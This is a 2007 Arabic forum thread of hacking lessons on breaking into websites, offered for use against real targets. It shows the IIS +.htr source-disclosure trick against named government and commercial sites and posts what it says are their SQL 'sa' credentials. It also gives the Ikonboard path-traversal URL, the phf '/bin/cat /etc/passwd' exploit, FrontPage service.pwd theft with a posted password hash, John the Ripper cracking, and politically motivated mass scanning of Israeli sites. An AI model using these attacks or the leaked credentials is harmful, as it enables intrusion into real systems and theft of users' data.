المستخدمين وكلمات السر وبامكانك تعديل وحذف اي موضوع وصلاحيات لم تكن تحلم بها ، اما اذا كان الموقع يحتوي على ميزة
قائمة المراسلات فسوف تحصل على اعداد خيالية من الايميلات ، عندها قم بانشاء شركة للدعاية والاعلان وسوف تصبح ثريا اذن لاتنسى LinuxRay_
توقع ان تجد اي شئ داخل قواعد بيانات معلومات اشخاص - ارقام هواتف - عناوين - تورايخ الميلاد ، ممكن ان تصبح Administrator .


اعرف انه قد اصابك الملل الان لكن استعد نشاطك من جديد فالطريق مازال طويلا ...


س : مالذي تحتاجة للدخول على قواعد بيانات SQL ؟

تحتاج فقط لل User Name و Passwd

س : من اين احصل على اسم المستخدم وكلمة المرور ؟

هناك طرق عديدة للحصول على User name and Passwd منها كما اسلف صفحات ال ASP وملفات اخرى من نوع *.sql هناك ثغرات كثير يمكن
ان تحصل منها على كلمات المرور مثل ثغرة +.htr
كيف تستخدم هذه الثغرة :


http://target/page.asp+.htr
target : الموقع الهدف
Page : صفحة asp
+.htr : الثغرة


هذه الثغرة تقوم احيانا بفتح صفحة بيضاء لاتحتوي على اي حرف .... اعرف انك سوف تتساءل مالفائدة اذن منها الفائدة هو
خلف هذه الصفحة البيضاء اذهب الى View Source لكي ترى اوامر البرمجة الخاصة ب ASP التى لايمكن لك ان تراها في الوضع العادي : مثل


<%

Set DB= Server.CreateObject("ADODB.Connection")
DB.Open "DRIVER=SQL Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft (R) Developer Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666"


%>

في الكود السابق ترى ان اسم المستخدم هو _LinuxRay
وكلمة السر هي 6666666




الشئ المضحك انه احيانا اذا كان هناك خطأ في صفحة ال ASP مثل الاتي :

AMicrosoft VBScript runtime error '800a01a8'

Object required: 'Conn'

/filename.inc, line 5

هناك ملف ينتهي بامتداد *.inc هذا ملف يحتوي على اوامر يتم تنفيذها من جانب الملقم ويحتوي على اسم المستخدم وكلمة المرور
اذن ماذا تنتظر قم بسحب هذا الملف وذلك باضافة اسم الملف في عنوان الموقع .


وممكن ان ترى مثل هذا الامر في صفحة ASP
عند تطبيق الثغرة عليها هذا يعني ان اوامر البرمجة داخل ملف database.inc

<!--#include file = "database.inc"-->


وهناك عدة ملفات تحتوي على كلمة المرور مثل ملفات

global.asa
++global.asa
beforemilion-global.asa
-global.asa
milion.sql
global-direct.asa

ليس من الضرورة ان تكون الملفات بهذه الاسماء لكن هذا هو المعتاد عليه من قبل مبرمجين SQL

وكل ماعليك فعله ان تكتب اسم الصفحة مثل الاتي :

global.asa+.htr

هناك ثغرة قديمة في IIS 3 وهي ان تضيف بعد صفحة ASP هذا الرمز ::$data كما يلي
file.asp::$data
هذه الثغرة لاتعمل الا على IIS 3 فلا تتعب نفسك بتطبيقها فقط للعلم لا اكثر .


لقد اقتربنا من النهاية ... ماذا بعد الحصول على اسم المستخدم وكلمة المرور ؟؟

بعدها الدخول على قاعدة ال SQL !!

هناك عدة برامج تدخل على قاعدة البينات انا استخدم Visual interdev 6.0 لكني مازلت افضل استخدام البرنامج السهل ACCESS 2000


كل ما عليك فعله هو فتح البرنامح الذهاب الى قائمة
File
اختر
New
ومن قائمة الملفات الجديدة اختار
Project (Exiting Data)
اي مشروع قاعدة بيانات موجودة .
سيظهر لك مربع لانشاء الملف اختر
Create
اي انشاء

الان سترى مربع
Data Link Properties

تحتاج فقط لثلاث معلومات اسم الموقع او الاي بي - اسم المستخدم - كلمة المرور

1 - ادخل اسم الموقع في صندوق Select or enter server name

2 - اسم المستخدم في User Name

3 - كلمة السر Password


ملاحظة ( قم بإزالة الصح من مربع Blank Password)

اضغط في البداية على Test Connection في الاسفل لاختبار الاتصال بقاعدة البيانات اذا رأيت هذه العبارة Test Connection Succeeded
فمعناه ان الاتصال بقاعدة البيانات تم بنجاح.
يمكنك الان ان تختار اي قاعدة بيانات تريد الدخول اليها من القائمة المسندلة :
Select the data base on the server
واضغط على OK او موافق .

فئران التجارب :
موقع http://www.moe.gov.sa (http://www.moe.gov.sa/)

1- قم بالدخول على الصفحة التالية :

http://www.moe.gov.sa/news_admin.asp

سترى مايلي

Microsoft VBScript runtime error '800a01a8'

Object required: 'Conn'

/news_admin.asp, line 7


ثم طبق عليها ثغرة htr كتالي :

http://www.moe.gov.sa/news_admin.asp+.htr

اذهب الى السورس لترى

<!--#include file = "database.inc"-->

قم بسحب ملف database.inc كتالي :

http://www.moe.gov.sa/database.inc

سوف ترى مايلي :

<%

Set DB= Server.CreateObject("ADODB.Connection")
DB.Open "DRIVER=SQL Server;SERVER=CNW2;UID=sa;PWD=;APP=Microsoft (R) Developer Studio;WSID=CNW2;DATABASE=moe_dbs", "sa", "123321"


%>

هل تعرف مالذي امام عينك الان انه اسم المستخدم وكلمة المرور ..... سارع بالتشبيك على قاعدة البيانات انا اعرف ان لا احد يحب مادة
الكيمياء .

فأر التجارب الثاني :

موقع http://www.itsalat.com (http://www.itsalat.com/)

1 - User name : sa Passwd : sp2000

هذا فأر على الطاير شبك على قاعدة البيانات واحصل على ما تري

Linux Root
, Wed, 27 Jun 2007 15:02:16 +0200
الدرس التاسع والثلاثين
الأختراق العشوائي
Random Hacking




- ماهو الـإختراق العشوائي Random Hacking
- تطويره بحيث يصبح يبحث على إستثمارات غير الـ CGIScripts
- كيف تستغل اي ثغره بعد الحصول عليها

- ماهو الـإختراق العشوائي Random Hacking
هو البحث في كميه كبيره من المواقع عن ثغره محدده ، وهذا سهل ويعود بمواقع كثيره جدا جاهزه للإختراق ، مثال بسيط جدا ، روح على محرك بحث ، من محركات البحث التي تعتمد على الـ spiders أو العناكب مثل altavista.com وأكتب link:xxxx.cgi or pl ، (إرجع لشرح زورو في رياضيات البحث) مثلا نبحث عن لنك لملف بإسم help.cgi ، link:help.cgi المواقع المردوده لك نتيجه للبحث كلها تملك منتدى Ikonboard ، إفتح واحد منها وأبحث في المصدر الكود HTML عن السكربت الذي بحثت عنه help.cgi لتعرف اين مكانه ، لنفرض مكانه هنا http://www.example.com/cgi-bin/help.cgi
أكتب بعد الملف غير العنوان ليصبح http://www.example.com/cgi-bin/help....on=../members/ (http://www.example.com/cgi-bin/help.cgi?helpon=../members/)[member].cgi%00
مع ملاحظه تغيير [member] بإسم عضو وبدون القوسين طبعا
سوف يعرض لك معلومات العضو كامله ومن ظمنها كلمة المرور وهذه الثغره لـ المنتدى Ikonboard 2.1.7 وهذا ليس لب موضوعي ولكن هي بدايه ومثال لا تحفظه لأني أحضرت أبسط مثال فقط فيوجد غيره مئات بل آلاف ملفات الـ CGIScript تملك ثغرات مثل هذه واغلب إستثماراتها تكون من خلال url
للحصول على مثل هذه الإستثمارات لثغرات ملفات السي جي آي سكريبت شوف الأرشيف هذا وهو لغته روسيه أعتقد ولكن ما يهم لأننا نبحث عن الـ Exploit أو الإستثمار
http://www.secure.f2s.com/eng_ver/bugs/
وممكن تأخذ إسم المنتج مثلا وتضعه في محرك البحث لـ http://www.securiteam.com/ وتشوف النتائج ، أو تشترك في القائمه البريده لـ سيكيورتي فوكس فهي مفيده جدا أنا شاركت من قبل فتره وجدا أعجبت بها وهي مختصه في الأمن وليس لـثغرات السي جي آي سكربت ، يعني امن واخبار وكل شئ .... ويوجد برنامج تقدمه سيكيورتي فوكسي بإسم سيكيورتي فوكس بيجر ، هو برنامج لتسهيل عمليه الحصول على الأخبار ووو...الخ


- تطويره بحيث يصبح يبحث على إستثمارات غير الـ CGIScripts
الإختراق العشوائي إذا كان فعلا عشوائي ، يعني تخترق اي موقع ولو بدون سبب فهذه همجيه !! ، لكن ممكن نستفيد منه إحنا في أنه ما يكون في شكل همجي ، أنا اقول لك كيف ، مثلا إسرائيل اللي الكل يكرهها ، الذين يأمرون الفلسطينيين بأوقاف إطلاق النار ، الكل يكرههم ليس لأجل أنهم يهود ، لا نكرههم لأنهم ظلموا فلسطين ، عندهم موقع فيه آلاف من مواقعهم هذا هو 12610 sites تنتهي بـ co.il و 1104 sites تنتهي بـ org.il و 70 sites تنتهي بـ ac.il و 78 sites. تنتهي بـ gov.il وهذه مهمه ، و 54 sites. تنتهي بـ net.il و 29 sites. تنتهي بـ muni.il و 2009 sites تنتهي بـ com ، و 137 sites. تنتهي بـ net و org - 121 sites. و edu - 4 sites. لعينه ، israel.net - 84 sites. و il - sites. ........عشان تحصل على كل هذه السايت روح الموقع هذا http://iguide.co.il/sites/sites.htm

وفيه كمان محركات بحث

http://www.achla.co.il/
http://www.reshet.co.il/data/index.vs?dw=1
http://www.maven.co.il/
http://www.tapuz.co.il/
http://www.walla.co.il/
http://www.info.gov.il/find.pl

وفيه محرك أعدم منها واللي هو altavista.co.il

المهم على كل شخص منا أن يصلح فرز للبيانات الموجوده في هذه المواقع ، يستخدم اللغه التي يتقنها ليصنع برنامج يصلح فرز ويضعها في ملف تكست بدون اشياء ثانيه معها

العمليه الثانيه هي البحث فيها كلها عن منتج ، مثلا w3-msql/ ، الطريقه سهله جدا ، أولا يتم الشبك مع بروكسي مثلا proxy.isp.net.sa :8080 وثم يرسل له أمر GET ، مثلا ترسل للبروكسي


GET http://www.com.il/cgi-bin/w3-msql/ HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: ar-sa
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)
Host: www.com.il (http://www.com.il/)
Proxy-Connection: Keep-Alive

وهو يطلب من البروكسي أحضار الموقع http://www.com.il/cgi-bin/ ، يتضح طلبنا لـ cgi-bin/w3-msql/ ، في الحقيقه لا نبحث عن ثغرات سي جي آي ، ولكن نبحث عن كل المواقع التي يوجد بها المنتج WWWMSQL ، يعني المواقع الإسرائليه مثلا التي جمعناها في ملف تكست كلها تأخذ واحد واحد وتدخل في البرنامج الذي صممناه وترسل الى البروكسي بحثا عن cgi-bin/w3-msql وثم يحفظ رد البروكسي في ملف خارجي ، وهكذا حتى ننتهي من كل المواقع ، وثم نفتح الملف ونشوف التي تم إيجاد المنتج WWWMSQL داخها والتي لم يوجد ، ونتوجه الى سيكيورتي فوكس والا سيكيورتي تيم والا أي موقع يعجبك وابحث عن w3-msql ، مثلا في سيكوتي تيم نجد Exploit لـ w3-msql يمكن تطبيقه من المتصفح ، وهو هنا http://www.securiteam.com/exploits/2WUQBRFS3A.html
طريقه فحص عده مواقع بحثا عن منتج فيها أسميها انا Random Hacking يعني إختراق عشوائي ، ولكن لو فعلا بحثت عن w3-msql في المواقع الإسرائليه فأنا أقول لك بأنك ما راح تلقى كثير أو لن تجد شئ ، ممكن تبحث عن /_vti_pvt/ لترصد كل المواقع التي فيها فرونت بيج ، وطبعا بعد ما يتم حفظ كل المعلومات المسترجعه من البروكسي تكون بشكل HTML عشان كذا أنت خل الملف يكون بنسق *.html وافتحه وتجد كل المواقع ، اللي كتب عنها ..The page cannot be displayed واللي Forbddien واللي ....not found ....الخ ، من هذه الردود تعرف اللي نت فاوند والا موجود ولكن غير مسموح بالوصول له ..الخ بهذه الطريقه تعرف اللي موجود عليه واللي مو موجود .....والباقي عليك



- كيف تستغل اي ثغره بعد الحصول عليها
إذا كانت url ما يبغا لها فلسفه ، كود c وما عرفت تشغله أو قابلت فيه أخطاء فممكن تبحث عن فرجون ثاني لـه ولكن بلغه perl أو Shell *.sh وهو الذي يقابل Batch في ويندوز وتحدثنا عنها في كوكب لغات البرمجه ، من الدوس بعد ما تثبت أكتيف بيرل أكتب perl exploit.pl إذا كان الـ exploit بلغه بيرل ولكن طبعا فيه أشياء تغييرها في الكود نفسه ، وهذه الأشياء تكون مكتوبه بين علامات التعليقات وأكيد بتواجه مشاكل إذا ما تعرف شئ في بيرل ، في هذه الناحيه لا تطلب شرح بالصور إذا رجع لك رد طويل ما قدرت تقراه ممكن تحفظ الخرج عن طريق علامة < وثم مسافه وإسم الملف مثلا perl exploit.pl > log.htm
وبالنسبه للمنتج أكتيف بيرل فقط تواجه فيه مشاكل ، لأن بعض الـ Exploit كتب في الإصدار أربعه وممكن خمسه وممكن ما يعمل زين في أكتايف بيرل لذلك قد تضطر لتغير المفسر عندك أو تعدل في الكود وهذا كله يطلب خبره في اللغه ، وعلى فكره ليونكس (أعمل على RedHat 6.2 )فيه مفسر بيرل ممتاز جدا افضل من أكتيف بيرل بعشرات المرات



الموضوع اطول من كذا ولكن أنا تجاهلت بعض منه لأن فيه أشياء لو ذكرتها رايح تشب حرب أهليه بين المواقع العربيه

Linux Root
, Wed, 27 Jun 2007 15:05:26 +0200
الدرس الاربعين
مكانيكية المواقع وكيفية الاختراق عن طريق لثغرات

ملاحظة ترى هذا تجميع معلومات ومستنتجات من عندي فاذا خظأت ارجو تصححوني

السلام عليكم راح اشرح اشِوية شلون يشتغل الموقع وعملية الاختراق عن طريق الثغرات
اول شي يوجد نوعين من سيرفر المواقع
اول واحد SSI للي هو يدعم الويندز
وهو سيرفر عادي يوجد به اخطاء كثيرة وممكن اختراقه
والثاني apache يالله شنو هذا وكيف انا اشرح
هذا سيرفر قوي قوي قوي جدا يتحكم بالمستخدم بشكل رهيب ولايمكن اختراقه بسهولة وهو يشتغل على اليونكس واليونكس وصعب تلاقي ثغرات فيه بعدين حتى لو قدرت ثغرات وقدرت تخترقه الباسيورد مشفرة بطريقة عجيبة وفي ملفين للباسيورد وااحد منهم الحقيق يعني بعد تضليل هذا
تصوروا حتى مايكروسوفت تستعمل هذا السيرفر ما تستعمل السيرفر اللي هي مصصمته وذلك يدل على مدى قوته
صممه مجموعة اسمه apache وهي ليست من دولة وحدة وانما عدة دول خلينا.
نشرح شلون يشتغل الموقع:
انته تدخل على الموقع
تجي مثلا تريد تدخل الموقع هل تعرف كيف يتم لك الدخول على الموقع شوف هذي مثال على كيف يعمل النظام

المستخدم--------السيرفر---------الستخدم

خلينا نشرح بدقة اكثر انته تريد تدخل موقع في ملفات السيرفر ما يسمحلك تدخل عليها مثل ملفات الباسيورد يعني هو يتحكم بيك يتحكم في الشغلات اللي انته تقدر تشوفها
فانته تريد تدخله تتطلب الاذن من السيرفر بدخول هذي مكان
بعدين يا يرسل السماح او الرفض
هذي العملية بطريقة مبسطة جدا جدا

زين هسه شنو معنى الثغرة ؟؟
الثغرة هي لما تكون تقدر تدخل على كل الملفات وحتى ملفات الباسيورد بدون ما يقدر السيرفر يوقفك او يمنعك فانته لما تدخل على الثغرة خلاص بعد انته امتلكته جيب ملف الباسيورد وخذ الموقع
زين كيف تلاقي الثغرة؟؟؟؟؟؟
عن طريق اي برامج سكان للمواقع واقواها شادو سكان سيكورتي

زين مثلا لقينا الثغرة كيف تستغلها؟؟(مو متاكد ميه بالميه)

اذا كان السيرفرSSI تقدر تدخل بالاكسبليوير بس بمجرد تحط اسم الثغرة
اذا كان الثغرة بالسيرفر apache
تروح ي موقع مال الثغرات مثل
www.root-shell.com (http://www.root-shell.com/)
بس هذا هل الايام ما يشتغل ما ادري ليش شوك موقع ثاني
المهم
وتدور باسم الثغرة اللي لقيتها بس على نظام perl
تنزل الملف
بعدين تفتحها وتنفذ اللي يقوله وخلاص انتهى الموضوع بطريقة بسيطة جداا
شوفوا هذي المواقع
http://www.oreillynet.com/pub/faqs/apache_faq_what
www.apache.org (http://www.apache.org/)
www.perl.org (http://www.perl.org/)

Linux Root
, Wed, 27 Jun 2007 15:13:35 +0200
الدرس الواحد والاربعين

أختراق المواقع

إختراق المواقع ماهو الا شئ بسيط ، نعم بسيط ولكن في حاله واحده وهي أن تتعرف على نظام التشغيل لسيرفر وهي مسأله في غايه البساطه والأمر الثاني ان تكون عالما بالثغرات الموجوده فيه ، وتكون المسأله صعبه إذا كنت تريد تريد إختراق مواقع كبيره ومشهوره ولها هيبه وحمايه عاليه حيث أنك في هذه الحاله سوف تنسى الثغرات الموجوده عندك عن النظام الخادم لهذا الموقع لأن وبالتأكيد قد رقعت وعليك أن تفكر في إكتشاف ثغره في هذا الموقع لتخترقه وهذه الناحيه لن أتحدث عنها لأني لا أعرفها ، ولكن سوف نتحدث عن البيسك سيرفر هو السيرفر الخادم لأكثر المواقع العربيه وهو سيرفر بسيط في الحمايه ,,,
لإختراق هذا النوع من السيرفرات عليك التعرف على نظام التشغيل له ويتم ذلك من عده طريق لتعرف عليه
مثلا نريد اختراق الموقع
www.kondor.com (http://www.kondor.com/)
وهذا موقع ليس مجاني بل هو نطاق له سيرفره ورقم آي بي ثابت وهذا شئ معلوم لدى الجميع
نرسل رساله الى عنوان بريدي خاطئ الى هذا السيرفر وسوف يرد عليك بأن هذا البريد غير موجود في الموقع والبريد مثلا هو
hgguutujfkerh@kondor.com
وهو بالفعل غير موجود في الموقع عنوان بريد بالإسم هذا ، من خلال الرساله التي وصلتك تخبركبأن عنوان البريد هذا غير موجود تستطيع التعرف من خلالها على نظام الموقع ، وهذه واحده من الطرق
ثانيا عليك الآن وبعد معرفه نظام التشغيل لهذا الموقع أن تبحث عن الثغرات له
////////////
////////////
ملاحظه مهمه
////////////
////////////
قد يخترق أحد المواقع ويكون السبب ليس نظام التشغيل ، بل يكون أحد البرامج المثبته عليه مثل ملفات سي حي آي وقد تستخدم لجلب ملف الباسورد المسمى دائما بـ passwd وهناك حادثه مثل هذه في إصدارات WWWThreads للمنتديات

/////////////////////////////////////////////////

لنفرض انك تبي تخترق سيرفر بسيط وقليل الأمن وهذا النوع منتشر بكثره بكثره نعم بكثره ، عندها سوف يكون إختراق هذا النوع والحصول على الباسورد فايل امر في غايه البساطه نعم في غايه البساطه ولاداعي بعد ان تخترق بأن تقول لمن يطلب منك جواب لسؤال .. كيف ؟ ان ترد عليه بأن العمليه معقده وهذا الرد كاذب
مثلا أدخل على السيرفر في وضع التخفي
anonymously (( إستخدم التلنت في هذه الخطوه ))
وانظر الى المجلد المسمى بـ
etc
وأطلب الملف
passwd
هل رأيت ... هي عمليه بسيطه ولكن قف ! الملف يحتوي على كلم السر الخاصه بالموقع وغسماء المستخدمين للسيرفر وكلماتهم السريه ولكن كلماتهم السريه تكون مشفره
طريقه أخرى لإختراق هذا النوع من السيرفرات
أبحث في الموقع المستهدف من خلال المتصفح عن يا ترى وجود سي جي آي
عند توفره أطلب الملف التالي
cgi-bin/phf?Qalias=x
/bin/cat /etc/passwd
مثلا عنوان الموقع هو
www.kondor.com (http://www.kondor.com/)
نكتب هكذا
www.kondor.com/cgi-bin/phf?Qalias=x (http://www.kondor.com/cgi-bin/phf?Qalias=x)
/bin/cat /etc/passwd
عندها سوف يرسل لك الملف
passwd
وسوف يكون في الملف إسماء وكلمات السر المرخص لهم دخول السيرفر ولكن قف هناك أمر حيرني كثيرا وجاب لي الصداع وحيث اني ذهبت لتصميم برامج لفك التشفير عن كلمات السر فهي مشفره وأنتهى الأمر بي البرنامج الذي صمم على يد أحدهم !

الآن سوف أضع أسئله وأجوبه لتسهل الفهم
س: ما الملف
passwd
وهل الحصول عليها يعتبر من الأشياء المسموح عرضها ؟
ج: الملف
passwd
يحتوي كلمات السر وأسماء المستخدمين المسموح لهم دخول جهاز السيرفر وهو غير مسموح بعرضه ولكن هناك ثغرات وطرق ذكرنا بعضها أو القليل منا وسوف نذكر أكثر ، المهم عند حصولك على الملف سوف تشاهد مكتوب فيه هكذا مثلا


Sources Code - شفرة

root:x:00000-Admin(0000):/:/bin/ksh
daemon:x1:0000-Admin(0000):/:
bin:x2:0000-Admin(0000):/usr/bin:
listen:x:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
nobody:/:noaccess:x:60002:60002:uid noaccess:/:
ftp:x4:
FTPUser:/export/home/ftp:
kondor:yu&rte6745kdRichardClark:/export/home/kondor



إحنا علينا من السطر هذا
kondor:yu&rte6745kdRichardClark:/export/home/kondor
ولتفسيره نقول بأن
إسم المستخدم هو
kondor
وكلمه السر المشفره .. حط خطين تحت كلمه مشفره هي
yu&rte6745kd
وايضا
User number: 201
Group Number: 4
Real Name (usually): Richard Clark
Home Directory: /export/home/rrc
Type of Shell: /bin/ksh
الآن فهمنا ماذ يعني السطر هذا السطر من الملف passwd
kondor:yu&rte6745kdRichardClark:/export/home/kondor

حاولت أن تعرف من هذه شئ
admin sign in:/:/bin/csh
sysadm:ufcNtKNYj7m9I:0:0:
Regular Admin login:/admin:/sbin/sh
bin:*2:Admin :/bin:
sys:*3:Admin :/usr/src:
adm:*4:Admin :/usr/adm:/sbin/sh
daemon:*1: Daemon Login for daemons needing
nobody:*:65534:65534::/:
ftp:*39:FTP guest login:/var/ftp:
dtodd:yYn1sav8tKzOI:101John Todd:/home/dtodd:/sbin/sh
joetest:0IeSH6HfEEIs2/home/joetest:/usr/bin/restsh
س : هل اي ثغره تنجح ؟
ج : لا طبعا ، لابد ان تكون عارفا لأي شئ هذه الثغره ولأي نظام تشغيل وهل يلزم أن يكون مع نظام التشغيل برنامج آخر ليتم الدخول على السيرفر أو على الروت ، وكل هذه المعلومات لابد من توفرها
مثلا الموقع alsahat.net يعمل على نظام لينكس
وقد يكون لثغره أن سبق ورقعت
س : هل يختلف تشفير كلمه السر من نظام لآخر ؟
ج : هذا شئ أكيد ...
س : هل هناك برامج مخصصه لكلمات السر لكل نظام ؟
ج : نعم ، مثلا برنامجي المفضل لكسر شفرات الكلمات السريه (passwd) لنظام يونكس هو Brute ولكن للأسف أنا لا أملكه الآن وهناك برنامج آخر قد يكون أفضل من سابقه وهو Cracker Jack 1.4
)(
إعذروني لن كان كلامي مو مرتب
)(




شكل الكلام والله مو مرتب ... عشان كذا بعيد أكتب لكم بتعمق أكثر والكلام اللي فوق هذا مجرد مقدمه
بكتب بالعاميه ازين لي ولكم
مو لازم تعرف الكلام الي سبق ذكرته لكن إفهم منه جواب السؤال :: كيف يتم :: فقط

=== نبداء من هنا وبعمق ===
عرفنا ان الملف
(سوف نسميه من الآن بإسم ملف الباسورد )passwd file
يحتوي على إسماء المستخدمين المرخص لهم الدخول الى السيرفر وكلماتهم السريه وعرفنا أيضا أنها مشفره ولكن ضع كل تفكيره في الحصول على ملف الباسورد وأترك كيفت كسر التشفير في النهايه فهي تعتبر بسيطه
فمتو كل اللي راح ,,,, تمام

إستغلال الثغرات
اولا ما هي الثغرات ,,, الثغرات هي حفر وهفوات في السفت وير فقط وتمكن أي شخص من الحصول على ماعلمومات أو نشر فيروسات من خلال هذه الثغره
من ضمن هذه الثغرات ، ثغره سبق وذكرتها لكم في هذا المقال وهي في ملفات السي جي آي واستخدمناها لإختراق الموقع
www.kondor.com (http://www.kondor.com/)
ونورد عنها الآن تفاصيل
تسمى هذه الثغره الأمنيه بـ
PHF
ومعظم السيرفرات تمتلك هذه الثغره والى الآن لم يتم رقعها مع الأسف (إذا وجد عنده سي جي آي فقط ) !:! إذا نجحت هذه الثغره فسوف يعرض لك ملف الباسورد ، زي هذا مثلا

Sources Code - شفرة


root:x:00000-Admin(0000):/:/bin/ksh
daemon:x1:0000-Admin(0000):/:
bin:x:0000-Admin(0000):/usr/bin:
listen:x4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
nobody:/:noaccess:x:60002:60002:uid noaccess:/:
ftp:x4:
FTPUser:/export/home/ftp:
kondor:yu&rte6745kdRichardClark:/export/home/kondor





كما ذكرنا سابقن (كتابه سابقاً هكذا سابقن أفضل ) لووول
أحفظ الملف في تكست او مستند نص عشان تسوي له عمليات لكسر التشفير

FTP Passwd
بعض السيرفرات تحفظ ملف الباسورد في الإف تي بي نفسه ، أي تستطيع الى حد بعيد أن تحصل على ملف الباسورد من خلال دخولك في وصع مخفي
anonymous logins
والدخول بالوضع الخفي شئ قانوني ، وتسحب ملف الباسورد من الهدف المحدد ، غستخدم احد هذه البرامج لهمل ذلك
WS FTP or CuteFTP
وبعد ماتدخل بالوضع الخفي راح تجيك لسته أو قائمه
إختر منها
etc
وراح يعرض لك عدد قليل من الملفات مثل هذا
"group, passwd"
وملف الباسورد مو شرط يكون إسمه
passwd
ممكن يكون غير كذا .. المهم أنت أسحبه وإفتحه ولو شفت إسم مثل
"root, daemon, FTP, nobody, ftplogin, bin"
وإذا لقيت بالقرب من هذه الكلمات رمز نجمه كهذه * وقد رمز آخر مثل علامه إكس فقط ، لن ينفعك الإستعانه بأحد الكراكر ولكن كل ماعليك أن تتعقب الباسورد ويجب ان تبحث لحل لهذه المشكله فأنا حتى تحصل على مثل هذا
"joetest:0IeSH6HfEEIs2/home/joetest:/usr/bin/restsh"
والآن إستعن بأحد الكراكر لكسر كلمة السر او حاول عن طريق البرامج الذي ذكرتها لك سابقن

س : ماهو إسم المستخد هنا وماهي كلمة السر المشفره ؟
جاوب أنت .... !:!

التعقب لملف الباسورد
الآن وبعد أن حصلت على مثل هذا
"joetest:*/home/joetest:/usr/bin/restsh"
فأنت الآن تملك
shadowed passwd
فهذا يتدلى في نظام التشفيل ولكن الـ
passwd file
يختلف (لا داعي لتعمق اكثر ) والملف
passwd file
هو الذي نجد كلمة السر فيه مشفره وليست رمز واحد مثل * أو x
و الـ
shadow file
يكون مكان كلمة السر نجمه أو رمز
وأنا الى الآن لست متأكد من هذه النقطه

Linux Root
, Wed, 27 Jun 2007 15:26:38 +0200
الدرس الثاني والاربعين
الطريقة الصحيحة والمثلى لإختراق المواقع


طبعا صارللي سنتين اتعلم شلون اخترق مواقع
وهاي اخر استنتاجاتي

اول خطوة في الاختراق واللي هي اخذ المعلومات

يعني نعرف الموقع الفلاني شنهو الملقم اللي شغال عليه والنظام والخدمات اللي يدعمها.

الملقمات اشهرها اثنين

IIS: من مايكروسوفت وهذه مليانة ثغرات. (ومواقع قليل مقفلة ثغراتها)

apache: من مجموعة مبرمجين متوزعين في انحاء العالم واختراقها شبه صعب.

طيب

الحين عندنا موقع

وشلون نعرف نظام التشغيل والملقم والخدمات والمعلومات كلها

عندك الموقع http://www.netcraft.net (http://www.netcraft.net/)

ادخله

تلاقي مربع

هنا تحط فيه الموقع اللي تبي تعرف المعلومات اللي فوق

مثلا نحط موقع البيت الابيض اللي هو whitehouse.org

ملاحظة: نكتبه من غير http:// ولا / اللي بالاخير

http://uptime.netcraft.com/up/graph....whitehouse.org

راح يطلع لنا التالي

The site www.whitehouse.org (http://www.whitehouse.org/) is running Microsoft-IIS/5.0 on Windows 2000
طيب

الحين عرفنا معلومتين مهمتين

اول شيء انه شغال على الملقم IIS5.0

ثاني شيء شغال على نظام ويندوز 2000

حلو

اول شيء نجرب ثغرات IIS5.0 عليه (راح احطها بعد الموضوع)

إذا مانفع شيء نشوف ثغرات نظام ويندوز 2000 (راح احط الموقع بعد الموضوع)

طيب

الحين فيه حاجة اسمها يوني كود

هذه تخترق فيها عن طريق المتصفح

وماتمشي إلا مع ملقمات IIS وهي عبارة عن عناوين طويلة تحطها بعد عنوان الموقع. راح احط امثلة عليها.

طيب لنفرض انه ماطلع فيها ثغرات؟

نشوف محتويات الموقع نفسه

نشوف إن كان عنده سجل زوار او منتدى او او او ونطلع ثغراتها من الموقع اللي راح ارفقه في الرد اللي بعد الموضوع.

طيب لو كان السيرفر اباتشي؟

خلونا ناخذ مثال موقع ارانك www.arank.com (http://www.arank.com/)

لو حللناه بالنيت كرافت راح نشوف النتيجة التالية

The site www.arank.com (http://www.arank.com/) is running Apache/1.3.20 (Unix) mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux

طيب هنا يهمنا ثلاث اشياء

الملقم وهو apache 1.3.20 و دعم فرونت بيج FrontPage/5.0.2.2510 وهذه مليانة ثغرات والثالث النظام وهو Linux

طيب

الملقم

اول شيء اباتشي من الملقمات الصعبة الإختراق إلا بعض الإصدارات منها فنحط هذه على جنب.

نشوف دعم الفرونت بيج

زي ماقلنا الفرونت بيج مليان ثغرات

وثغراته قوية وكثيرة تقريبا

منها مجلد _vti_pvt و _private هذه اللي نحتاجها غيره مامنه فايدة

داخل المجلدين راح نلاقي اربع ملفات مهمة وهي service.pwd و users.pwd و authors.pwd و adminstators.pwd ويعتبر هذا اخطر ملف

طيب لو قدرنا ننزل واحد من الملفات هذه (ملاحظة الثغرة هذه موجودة ب 70% من المواقع الموجودة عالنت) لو نزلناها نفتحها بالمفكرة ونلاقي السطر هذا على سبيل المثال
goodyco:CalXS8USl4TGM

وهذا من موقع قودي http://www.goody.com.sa/_vti_pvt/service.pwd

طيب الحين goodyco اليوزر والباسس مشفر واللي هو CalXS8USl4TGM

وشلون ينفك؟ ينفك ببرنامج اسمه john the repaier

تنزله وتحط الملف المشفر (مع اليوزر) بمجلد واحد وتفتح الدوس وتروح لمجلد جوهن وتكتب السطر التالي john -i PASSWORD.FILE

وعاد استناه يطلع لك الباسس

طيب نروح للفقرة الثالثة واللي هي النظام

زي ماشفنا النظام هو لينكس

لكن لينكس ايش؟ فيه ريد هات و ماندريك وفيه منه إصدارت كثير وثغرات اكثر

لكن هنا راح تواجهك مشكلتين

اول شيء معرفة النظام تقدر تطلعه من ابدا وتشغيل ول telnet واكتب عنوان الموقع يطلع لك النظام فوق نوعه وإصدارته

المشكلة الثانية لازم يكون عندك لينكس اصلا

علشان ثغراته بلغة ال c وهذه ماتشتغل إلا عاللينكس فقط

================

http://neworder.box.sk/ هذا الموقع مفيد جدا تكتب مثلا (فوق بالمربع اللي عاليمين) IIS او apache او منتدى واصدارته او اي برنامج ويطلع لك ثغراته

http://www.ussrback.com/ الموقع هذا خطير جداً جداً تروح ل EXPLOITS اللي عاليسار وتختار اول اختيار هنا ثغرات جميع الانظمة من لينكس و ويندوز و و و الخ.. ومنوعة من c و perl و يوني كود
================



للتعمق في هذا الموضوع راجعوا شرح UNICODE - Internet Information Service IIS4 - IIS5 الموجود بالقسم هذا.

Linux Root
